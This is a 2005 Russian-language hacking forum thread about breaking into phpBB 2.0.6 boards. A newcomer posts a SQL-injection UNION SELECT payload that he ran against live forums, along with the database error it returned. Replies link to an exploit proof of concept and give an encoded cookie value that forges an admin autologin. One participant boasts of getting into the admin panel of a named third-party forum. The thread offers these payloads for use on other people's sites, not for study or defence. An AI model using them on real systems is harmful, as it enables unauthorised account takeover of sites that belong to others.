ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL-injection в PhpBB 2.0.6
  #1  
Старый 18.05.2005, 16:56
Аватар для SQL_error
SQL_error
Новичок
Регистрация: 17.05.2005
Сообщений: 6
Провел на форуме:
0

Репутация: 0
Exclamation SQL-injection в PhpBB 2.0.6

Посмотрел видео KEZ'а про SQL-injection в форуме PhpBB 2.0.6 - ошибка синтаксиса в модуле search.php (search.php?search_id=1'). Нашел форумы на этом движке, вставляю строку search.php?search_id=1' - выходит ошибка. Далее подставляю id=1 UNION SELECT concat(char(97,58,55,58,123........59,125)) FROM phpbb_users WHERE user_id=2/*, но вместо результатов поиска наблюдаю на странице следующее:
Could not obtain search results
DEBUG MODE
SQL Error : -1 ERROR: syntax error at or near "," at character 104
SELECT search_array FROM phpbb_search_results WHERE search_id = 1 UNION SELECT concat(char(97,58,55,58,123,115,58,49,52........11 0,95,99,104,97,114,115,34,59,105,58,50,48,48,59,12 5)) FROM phpbb_users WHERE user_id=2/* AND session_id = '53a7f9e3d98b3a1c3ca90e2cd6c8ee6b'
Line : 693
File : /home1/home/sa/www/public_html/phpBB2/search.php
Т.е наблюдаю ту же ошибку вместе с введенной мною строкой И так в нескольких форумах. Подскажите пожалуйста из-за чего это может происходить, может я делаю чего не правильно....
P.S. Я понимаю что видео на античате не является призывом к действию, и не все может получится, что там показывают, но все же очень прошу помочь в моем вопросе новичку, я это использую только для самообразования...
 
Ответить с цитированием

  #2  
Старый 18.05.2005, 17:23
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

мда.
не проще ли пользоваца сплойтом, с которым можно сразу стать админом?
 
Ответить с цитированием

  #3  
Старый 18.05.2005, 18:54
Аватар для SQL_error
SQL_error
Новичок
Регистрация: 17.05.2005
Сообщений: 6
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Green_Bear  
мда.
не проще ли пользоваца сплойтом, с которым можно сразу стать админом?
А как он называется и где его мона взять ???
 
Ответить с цитированием

  #4  
Старый 18.05.2005, 18:59
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

возможно причина в том что было удалено самое превое сообщение.
 
Ответить с цитированием

  #5  
Старый 18.05.2005, 19:02
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

Сплойт тут вроде
http://rst.void.ru/download/r57phpbb-poc.txt
 
Ответить с цитированием

  #6  
Старый 18.05.2005, 19:04
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

логинишься в опере\мозиле.
удаляешь phpbb2mysql_sid
меняешь phpbb2mysql_data на

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

жмешь обновить.. и все.
 
Ответить с цитированием

  #7  
Старый 18.05.2005, 19:52
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

Гы кстати еще полно форумов где катят админские кукисы, особенно буржуйских,
ща по адмнке лазила тут http://www.kona.dk/phpBB2/ ))) кономейстер гы
 
Ответить с цитированием

  #8  
Старый 19.05.2005, 08:38
Аватар для SQL_error
SQL_error
Новичок
Регистрация: 17.05.2005
Сообщений: 6
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Grrl  
Сплойт тут вроде
http://rst.void.ru/download/r57phpbb-poc.txt
Эта ссылка не рабочая, есть ссылка на скомпиленный сплоит ???
 
Ответить с цитированием

  #9  
Старый 19.05.2005, 12:33
Аватар для OLIVER
OLIVER
Познающий
Регистрация: 05.02.2005
Сообщений: 73
Провел на форуме:
46429

Репутация: 5
По умолчанию

Блин, Green_Bearт ебе описал самый простой способ и надёжный способ )
 
Ответить с цитированием

  #10  
Старый 19.05.2005, 14:43
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

Ссылка рабочая, а если запусткать не умеешь так и скажи))
Скампилированный был где-то не помню ссылки...
Как тебе уже и советовали тут, не парься а лучше юзай фокус с кукисами))
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ